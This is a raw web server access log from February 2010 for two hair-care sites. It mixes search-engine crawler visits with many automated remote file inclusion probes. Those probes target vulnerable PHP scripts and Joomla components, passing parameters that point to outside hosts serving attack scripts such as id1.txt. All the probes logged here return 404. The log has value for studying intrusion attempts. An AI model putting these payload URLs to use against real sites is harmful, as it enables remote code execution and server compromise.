123.143.29.250 - - [28/Feb/2010:21:24:39 -0800] "GET /logs/access_100111.log%20%20//skin/zero_vote/error.php?dir=http://www.gogos.kr/bbs/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
123.143.29.250 - - [28/Feb/2010:21:24:40 -0800] "GET /skin/zero_vote/error.php?dir=http://www.gogos.kr/bbs/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
216.129.119.41 - - [28/Feb/2010:21:24:40 -0800] "GET /freehairsecretsphp/viewtopic.php?p=4569 HTTP/1.1" 200 349 "-" "Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)" "www.freehairsecrets.com"
200.93.147.154 - - [28/Feb/2010:21:25:13 -0800] "GET /logs////skin/ggambo7002_board/comment_modify.php?dir=http://www.howtolisten.kr//bbs/icon/private_name/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
200.93.147.154 - - [28/Feb/2010:21:25:13 -0800] "GET ///skin/ggambo7002_board/comment_modify.php?dir=http://www.howtolisten.kr//bbs/icon/private_name/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
200.93.147.154 - - [28/Feb/2010:21:25:14 -0800] "GET /logs/access_100125.log%20%20////skin/ggambo7002_board/comment_modify.php?dir=http://www.howtolisten.kr//bbs/icon/private_name/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
200.93.147.154 - - [28/Feb/2010:21:25:15 -0800] "GET /logs/access.log%20%20////skin/ggambo7002_board/comment_modify.php?dir=http://www.howtolisten.kr//bbs/icon/private_name/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
200.93.147.154 - - [28/Feb/2010:21:25:15 -0800] "GET /logs////skin/ggambo7002_board/comment_modify.php?dir=http://www.howtolisten.kr//bbs/icon/private_name/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
200.93.147.154 - - [28/Feb/2010:21:25:15 -0800] "GET ///skin/ggambo7002_board/comment_modify.php?dir=http://www.howtolisten.kr//bbs/icon/private_name/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
123.143.29.250 - - [28/Feb/2010:21:26:56 -0800] "GET /logs/access_100104.log%20%20//skin/zero_vote/error.php?dir=http://www.gogos.kr/bbs/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
64.46.39.49 - - [28/Feb/2010:21:28:15 -0800] "GET /skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.luomoeillegno.com/extras/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
64.46.39.49 - - [28/Feb/2010:21:28:15 -0800] "GET /logs//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.luomoeillegno.com/extras/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
64.46.39.49 - - [28/Feb/2010:21:28:18 -0800] "GET /logs/access.log//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.luomoeillegno.com/extras/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
195.2.240.202 - - [28/Feb/2010:21:31:34 -0800] "GET /freehairsecretsphp/index.php HTTP/1.0" 200 333 "http://growlonghairfast.com/freehairsecretsphp/index.php" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; ru) Opera 8.01" "growlonghairfast.com"
195.2.240.202 - - [28/Feb/2010:21:31:35 -0800] "GET / HTTP/1.0" 200 910 "http://growlonghairfast.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; ru) Opera 8.01" "growlonghairfast.com"
199.120.90.223 - - [28/Feb/2010:21:34:46 -0800] "GET /administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://geo.metodist.ru/images/id? HTTP/1.1" 404 - "-" "libwww-perl/5.812" "growlonghairfast.com"
95.108.150.235 - - [28/Feb/2010:21:38:14 -0800] "GET /robots.txt HTTP/1.1" 404 - "-" "Yandex/1.01.001 (compatible; Win16; H)" "www.freehairsecrets.com"
95.108.150.235 - - [28/Feb/2010:21:38:15 -0800] "GET /robots.txt HTTP/1.1" 404 - "-" "Yandex/1.01.001 (compatible; Win16; H)" "freehairsecrets.com"
95.108.150.235 - - [28/Feb/2010:21:38:16 -0800] "GET / HTTP/1.1" 200 926 "-" "Yandex/1.01.001 (compatible; Win16; H)" "www.freehairsecrets.com"
95.108.150.235 - - [28/Feb/2010:21:38:17 -0800] "GET / HTTP/1.1" 200 926 "-" "Yandex/1.01.001 (compatible; Win16; H)" "freehairsecrets.com"
95.108.150.235 - - [28/Feb/2010:21:38:18 -0800] "GET / HTTP/1.1" 200 926 "-" "Yandex/1.01.001 (compatible; Win16; H)" "www.freehairsecrets.com"
95.108.150.235 - - [28/Feb/2010:21:38:19 -0800] "GET / HTTP/1.1" 200 926 "-" "Yandex/1.01.001 (compatible; Win16; H)" "freehairsecrets.com"
81.92.215.78 - - [28/Feb/2010:21:40:56 -0800] "GET /logs//ggambo7002_board/comment_modify.php?dir=http://smkn-13bdg.sch.id/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
81.92.215.78 - - [28/Feb/2010:21:40:56 -0800] "GET /ggambo7002_board/comment_modify.php?dir=http://smkn-13bdg.sch.id/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
81.92.215.78 - - [28/Feb/2010:21:40:56 -0800] "GET /logs/access.log//ggambo7002_board/comment_modify.php?dir=http://smkn-13bdg.sch.id/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
81.92.215.78 - - [28/Feb/2010:21:40:57 -0800] "GET /ggambo7002_board/comment_modify.php?dir=http://smkn-13bdg.sch.id/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
81.92.215.78 - - [28/Feb/2010:21:40:57 -0800] "GET /logs//ggambo7002_board/comment_modify.php?dir=http://smkn-13bdg.sch.id/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
81.92.215.78 - - [28/Feb/2010:21:40:57 -0800] "GET /logs/access.log//ggambo7002_board/comment_modify.php?dir=http://smkn-13bdg.sch.id/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
165.132.30.11 - - [28/Feb/2010:21:41:27 -0800] "GET /logs//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://zerozon.co.kr/data/eeng/heheh.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
165.132.30.11 - - [28/Feb/2010:21:41:27 -0800] "GET /logs/access_100111.log%20%20//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://zerozon.co.kr/data/eeng/heheh.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
165.132.30.11 - - [28/Feb/2010:21:41:28 -0800] "GET /administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://zerozon.co.kr/data/eeng/heheh.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
118.129.166.221 - - [28/Feb/2010:21:44:50 -0800] "GET /ggambo7002_board/comment_modify.php?dir=http://smkn-13bdg.sch.id/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
118.129.166.221 - - [28/Feb/2010:21:44:50 -0800] "GET /logs/access.log//ggambo7002_board/comment_modify.php?dir=http://smkn-13bdg.sch.id/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
118.129.166.221 - - [28/Feb/2010:21:44:50 -0800] "GET /logs//ggambo7002_board/comment_modify.php?dir=http://smkn-13bdg.sch.id/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
195.2.240.202 - - [28/Feb/2010:21:45:37 -0800] "GET /freehairsecretsphp/index.php HTTP/1.0" 200 333 "http://freehairsecrets.com/freehairsecretsphp/index.php" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; InfoPath.1" "freehairsecrets.com"
195.2.240.202 - - [28/Feb/2010:21:45:38 -0800] "GET / HTTP/1.0" 200 910 "http://freehairsecrets.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; InfoPath.1" "freehairsecrets.com"
199.120.90.223 - - [28/Feb/2010:21:46:00 -0800] "GET /logs/access_100111.log//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://geo.metodist.ru/images/id? HTTP/1.1" 404 - "-" "libwww-perl/5.812" "growlonghairfast.com"
199.120.90.223 - - [28/Feb/2010:21:46:01 -0800] "GET /administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://geo.metodist.ru/images/id? HTTP/1.1" 404 - "-" "libwww-perl/5.812" "growlonghairfast.com"
199.120.90.223 - - [28/Feb/2010:21:46:01 -0800] "GET /logs//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://geo.metodist.ru/images/id? HTTP/1.1" 404 - "-" "libwww-perl/5.812" "growlonghairfast.com"
67.195.112.115 - - [28/Feb/2010:21:46:20 -0800] "GET /freehairsecretsphp/viewtopic.php?p=13117 HTTP/1.0" 200 333 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "freehairsecrets.com"
199.120.90.223 - - [28/Feb/2010:21:47:08 -0800] "GET /logs/access_100111.log//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://geo.metodist.ru/images/id? HTTP/1.1" 404 - "-" "libwww-perl/5.812" "growlonghairfast.com"
199.120.90.223 - - [28/Feb/2010:21:47:08 -0800] "GET /administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://geo.metodist.ru/images/id? HTTP/1.1" 404 - "-" "libwww-perl/5.812" "growlonghairfast.com"
199.120.90.223 - - [28/Feb/2010:21:47:09 -0800] "GET /logs//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://geo.metodist.ru/images/id? HTTP/1.1" 404 - "-" "libwww-perl/5.812" "growlonghairfast.com"
216.129.119.41 - - [28/Feb/2010:21:47:14 -0800] "GET /freehairsecretsphp/viewtopic.php?p=14335 HTTP/1.1" 200 349 "-" "Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)" "www.freehairsecrets.com"
200.93.147.154 - - [28/Feb/2010:21:49:28 -0800] "GET /logs/access_100125.log%20%20////skin/ggambo7002_board/comment_modify.php?dir=http://www.howtolisten.kr//bbs/icon/private_name/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
200.93.147.154 - - [28/Feb/2010:21:49:28 -0800] "GET /logs////skin/ggambo7002_board/comment_modify.php?dir=http://www.howtolisten.kr//bbs/icon/private_name/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
216.129.119.41 - - [28/Feb/2010:21:49:30 -0800] "GET /freehairsecretsphp/viewtopic.php?p=4380 HTTP/1.1" 200 349 "-" "Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)" "www.freehairsecrets.com"
200.93.147.154 - - [28/Feb/2010:21:49:30 -0800] "GET ///skin/ggambo7002_board/comment_modify.php?dir=http://www.howtolisten.kr//bbs/icon/private_name/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
200.93.147.154 - - [28/Feb/2010:21:49:35 -0800] "GET /logs////skin/ggambo7002_board/comment_modify.php?dir=http://www.howtolisten.kr//bbs/icon/private_name/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
200.93.147.154 - - [28/Feb/2010:21:49:45 -0800] "GET /logs/access.log%20%20////skin/ggambo7002_board/comment_modify.php?dir=http://www.howtolisten.kr//bbs/icon/private_name/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
200.93.147.154 - - [28/Feb/2010:21:49:50 -0800] "GET ///skin/ggambo7002_board/comment_modify.php?dir=http://www.howtolisten.kr//bbs/icon/private_name/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
216.129.119.41 - - [28/Feb/2010:21:50:36 -0800] "GET /freehairsecretsphp/viewtopic.php?p=6559 HTTP/1.1" 200 349 "-" "Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)" "www.freehairsecrets.com"
193.47.80.39 - - [28/Feb/2010:21:51:02 -0800] "GET /robots.txt HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; Exabot/3.0; +http://www.exabot.com/go/robot)" "freehairsecrets.com"
193.47.80.39 - - [28/Feb/2010:21:51:02 -0800] "GET /tmp/ HTTP/1.1" 200 659 "-" "Mozilla/5.0 (compatible; Exabot/3.0; +http://www.exabot.com/go/robot)" "freehairsecrets.com"
216.129.119.41 - - [28/Feb/2010:21:51:42 -0800] "GET /freehairsecretsphp/viewtopic.php?p=15065 HTTP/1.1" 200 349 "-" "Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)" "www.freehairsecrets.com"
200.93.147.154 - - [28/Feb/2010:22:13:33 -0800] "GET /logs/access_100125.log////skin/ggambo7002_board/comment_modify.php?dir=http://www.howtolisten.kr//bbs/icon/private_name/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
200.93.147.154 - - [28/Feb/2010:22:13:35 -0800] "GET /logs/access.log////skin/ggambo7002_board/comment_modify.php?dir=http://www.howtolisten.kr//bbs/icon/private_name/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
87.230.93.144 - - [28/Feb/2010:22:13:50 -0800] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://www.partyandmoreevents.de/two?? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.freehairsecrets.com"
87.230.93.144 - - [28/Feb/2010:22:13:50 -0800] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://www.alst.ru/cmd??&u=x HTTP/1.1" 404 - "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.freehairsecrets.com"
87.230.93.144 - - [28/Feb/2010:22:13:50 -0800] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://www.partyandmoreevents.de/two?? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.freehairsecrets.com"
87.230.93.144 - - [28/Feb/2010:22:13:50 -0800] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://www.alst.ru/cmd??&u=x HTTP/1.1" 404 - "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.freehairsecrets.com"
87.230.93.144 - - [28/Feb/2010:22:15:18 -0800] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://www.partyandmoreevents.de/two?? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "growlonghairfast.com"
87.230.93.144 - - [28/Feb/2010:22:15:18 -0800] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://www.partyandmoreevents.de/two?? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "growlonghairfast.com"
87.230.93.144 - - [28/Feb/2010:22:15:19 -0800] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://www.alst.ru/cmd??&u=x HTTP/1.1" 404 - "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "growlonghairfast.com"
87.230.93.144 - - [28/Feb/2010:22:15:19 -0800] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://www.alst.ru/cmd??&u=x HTTP/1.1" 404 - "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "growlonghairfast.com"
67.195.37.99 - - [28/Feb/2010:22:15:22 -0800] "GET /freehairsecretsphp/viewtopic.php?p=7725 HTTP/1.0" 200 333 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "growlonghairfast.com"
193.111.95.42 - - [28/Feb/2010:22:18:36 -0800] "GET /logs//index.php?option=com_sef&Itemid=&mosConfig_absolute_path=http://www.moterostrailmadrid.es/blocks/ts????? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.freehairsecrets.com"
193.111.95.42 - - [28/Feb/2010:22:18:36 -0800] "GET /index.php?option=com_sef&Itemid=&mosConfig_absolute_path=http://www.moterostrailmadrid.es/blocks/ts????? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.freehairsecrets.com"
193.111.95.42 - - [28/Feb/2010:22:19:55 -0800] "GET /logs//index.php?option=com_sef&Itemid=&mosConfig_absolute_path=http://www.moterostrailmadrid.es/blocks/ts????? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.freehairsecrets.com"
193.111.95.42 - - [28/Feb/2010:22:19:55 -0800] "GET /index.php?option=com_sef&Itemid=&mosConfig_absolute_path=http://www.moterostrailmadrid.es/blocks/ts????? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.freehairsecrets.com"
110.45.145.178 - - [28/Feb/2010:22:39:44 -0800] "GET //administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.wonhyun.co.kr/bbs/goodid.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "growlonghairfast.com"
110.45.145.178 - - [28/Feb/2010:22:41:53 -0800] "GET //administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.wonhyun.co.kr/bbs/goodid.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.freehairsecrets.com"
121.101.214.54 - - [28/Feb/2010:22:42:14 -0800] "GET /logs//appserv/main.php?appserv_root=http://blog.kakuro.com.tw/include/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
121.101.214.54 - - [28/Feb/2010:22:42:14 -0800] "GET /appserv/main.php?appserv_root=http://blog.kakuro.com.tw/include/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
121.101.214.54 - - [28/Feb/2010:22:42:14 -0800] "GET /logs/access.log//appserv/main.php?appserv_root=http://blog.kakuro.com.tw/include/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
121.101.214.54 - - [28/Feb/2010:22:43:09 -0800] "GET /logs//appserv/main.php?appserv_root=http://blog.kakuro.com.tw/include/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
121.101.214.54 - - [28/Feb/2010:22:43:09 -0800] "GET /logs/access.log//appserv/main.php?appserv_root=http://blog.kakuro.com.tw/include/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
121.101.214.54 - - [28/Feb/2010:22:43:09 -0800] "GET /appserv/main.php?appserv_root=http://blog.kakuro.com.tw/include/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
76.180.205.168 - - [28/Feb/2010:22:51:02 -0800] "GET /freehairsecretsphp/index.php HTTP/1.0" 200 333 "http://growlonghairfast.com/freehairsecretsphp/index.php" "Mozilla/4.0 (compatible; MSIE 5.5; Windows 95; BCD2000)" "growlonghairfast.com"
76.180.205.168 - - [28/Feb/2010:22:51:02 -0800] "GET / HTTP/1.0" 200 910 "http://growlonghairfast.com/" "Mozilla/4.0 (compatible; MSIE 5.5; Windows 95; BCD2000)" "growlonghairfast.com"
116.127.121.117 - - [28/Feb/2010:22:56:02 -0800] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.formationalliance.com/images/id1.txt????????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
116.127.121.117 - - [28/Feb/2010:22:56:02 -0800] "GET /logs/access.log%20%20//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.formationalliance.com/images/id1.txt????????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
116.127.121.117 - - [28/Feb/2010:22:56:02 -0800] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.formationalliance.com/images/id1.txt????????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
116.127.121.117 - - [28/Feb/2010:22:56:13 -0800] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.formationalliance.com/images/id1.txt????????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
116.127.121.117 - - [28/Feb/2010:22:56:13 -0800] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.formationalliance.com/images/id1.txt????????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
116.127.121.117 - - [28/Feb/2010:22:56:13 -0800] "GET /logs/access.log%20%20//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.formationalliance.com/images/id1.txt????????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
110.45.145.178 - - [28/Feb/2010:22:57:05 -0800] "GET /logs/access.log///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.wonhyun.co.kr/bbs/goodid.txt? HTTP/1.0" 404 - "-" "libwww-perl/5.79" "www.freehairsecrets.com"
110.45.145.178 - - [28/Feb/2010:22:57:06 -0800] "GET //administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.wonhyun.co.kr/bbs/goodid.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.freehairsecrets.com"
110.45.145.178 - - [28/Feb/2010:22:57:07 -0800] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.wonhyun.co.kr/bbs/goodid.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.freehairsecrets.com"
110.45.145.178 - - [28/Feb/2010:23:00:20 -0800] "GET /logs/access_100125.log///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.wonhyun.co.kr/bbs/goodid.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "growlonghairfast.com"
110.45.145.178 - - [28/Feb/2010:23:00:21 -0800] "GET //administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.wonhyun.co.kr/bbs/goodid.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "growlonghairfast.com"
110.45.145.178 - - [28/Feb/2010:23:00:22 -0800] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.wonhyun.co.kr/bbs/goodid.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "growlonghairfast.com"
216.129.119.41 - - [28/Feb/2010:23:02:31 -0800] "GET /freehairsecretsphp/viewtopic.php?p=13709 HTTP/1.1" 200 349 "-" "Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)" "www.freehairsecrets.com"
216.129.119.41 - - [28/Feb/2010:23:03:41 -0800] "GET /freehairsecretsphp/viewtopic.php?p=14364 HTTP/1.1" 200 349 "-" "Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)" "www.freehairsecrets.com"
216.129.119.41 - - [28/Feb/2010:23:06:02 -0800] "GET /freehairsecretsphp/viewtopic.php?p=5046 HTTP/1.1" 200 349 "-" "Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)" "www.freehairsecrets.com"
216.129.119.41 - - [28/Feb/2010:23:07:10 -0800] "GET /freehairsecretsphp/viewtopic.php?p=15092 HTTP/1.1" 200 349 "-" "Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)" "www.freehairsecrets.com"
211.63.219.132 - - [28/Feb/2010:23:14:11 -0800] "GET /logs////skin/ggambo7002_board/comment_modify.php?dir=http://www.gogos.kr/bbs/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
211.63.219.132 - - [28/Feb/2010:23:14:12 -0800] "GET /logs/access_100125.log%20%20////skin/ggambo7002_board/comment_modify.php?dir=http://www.gogos.kr/bbs/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
211.63.219.132 - - [28/Feb/2010:23:14:13 -0800] "GET ///skin/ggambo7002_board/comment_modify.php?dir=http://www.gogos.kr/bbs/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
110.45.145.178 - - [28/Feb/2010:23:14:42 -0800] "GET /logs/access_100118.log///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.wonhyun.co.kr/bbs/goodid.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "growlonghairfast.com"
202.131.30.150 - - [28/Feb/2010:23:17:11 -0800] "GET /robots.txt HTTP/1.1" 404 - "-" "Yeti/1.0 (NHN Corp.; http://help.naver.com/robots/)" "freehairsecrets.com"
202.131.30.150 - - [28/Feb/2010:23:17:52 -0800] "GET /freehairsecretsphp/viewtopic.php?p=11471 HTTP/1.1" 200 349 "-" "Yeti/1.0 (NHN Corp.; http://help.naver.com/robots/)" "freehairsecrets.com"
116.127.121.117 - - [28/Feb/2010:23:20:24 -0800] "GET /logs/access.log%20%20//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.formationalliance.com/images/id1.txt????????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
116.127.121.117 - - [28/Feb/2010:23:20:24 -0800] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.formationalliance.com/images/id1.txt????????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
116.127.121.117 - - [28/Feb/2010:23:20:24 -0800] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.formationalliance.com/images/id1.txt????????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
77.234.201.2 - - [28/Feb/2010:23:20:25 -0800] "GET ///skin/ggambo7002_board/comment_modify.php?dir=http://www.farmwinona.org/jackz/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
77.234.201.2 - - [28/Feb/2010:23:20:25 -0800] "GET /logs/access_100125.log%20%20////skin/ggambo7002_board/comment_modify.php?dir=http://www.farmwinona.org/jackz/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
77.234.201.2 - - [28/Feb/2010:23:20:25 -0800] "GET /logs////skin/ggambo7002_board/comment_modify.php?dir=http://www.farmwinona.org/jackz/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
